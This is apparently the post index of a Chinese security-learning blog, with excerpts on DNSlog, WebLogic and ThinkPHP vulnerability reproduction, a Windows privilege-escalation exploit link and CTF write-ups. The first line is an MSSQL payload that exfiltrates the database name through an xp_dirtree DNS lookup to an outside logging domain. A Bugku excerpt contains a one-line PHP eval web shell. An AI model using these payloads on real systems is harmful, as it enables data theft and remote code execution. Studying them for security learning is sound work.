DECLARE @host varchar(128); SELECT @host=(select db_name())+ '.hfkzaq.ceye.io'; select @host; EXEC('master..xp_dirtree "\\'+@host+'\foobar$"'); ...
信息安全
DNS log 学习
DNSLOG的原理 DNS的解析是递归与迭代相结合的,下面给出了当我们访问 www.o2oxy.cn 时. 最后面访问的还是该域名的NS 服务器。阿里云的域名的NS 记录都是可以修改的。也就是说。如果我们本地建立一...
burp suite 分块插件的使用
github: https://github.com/Liang2580/chunked-coding-converter jar 如下: 11111111
CVE-2018-3191 复现
漏洞描述: 北京时间2018年10月17日,Oracle官方发布的10月关键补充更新CPU(重要补丁更新)中修复了一个高危的WebLogic远程代码执行漏洞(CVE-2018-3191)。 该漏洞允许未经身份验证的攻击者通过T3协...
CVE-2018-8120 Exp
https://github.com/unamer/CVE-2018-8120 CVE-2018-8120 CVE-2018-8120 Windows LPE exploit Supports both x32 and x64. Tested on: Win7 x32, Win7 x64...
ThinkPHP 5.x 代码执行
ThinkPHP 5.0.23 修复了一个代码执行的漏洞。之后Thinkphp 更新到5.0.24 这次代码执行的影响范围5.x <= 5.0.23 测试中我用的是5.0.23 安装...
2018/南宁市网安大赛/nnctf/write-up
Web 1.超简单 http://gxnnctf.gxsosec.cn:12311/ 看NO参数,匹配正则,白名单且长度大于1就那么就会返回flag 传参/?NO=01 即得到flag ...
密码保护:xss 代码分析
xss代码分析 eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee 你就是看不到。哈哈啊哈哈哈 你就是看不到。哈哈啊哈哈哈 你就是看...
三叶草CTF WEB 题
1.tets 2、2000字的检讨 复制出来提交 flag: SYC{evoA_Y0ur_JusT_3Scap3_Th3_Jav4scr1pt_l1m1T} 3、幸运...
Bugku INSERT INTO注入
<script language="php">@eval_r($_POST[sb])</script> 唔,学习了一波。 这道题目的去掉了, 不能用if(exp1,exp2,exp3)的方式。 然后我就恶补了一下 case when the...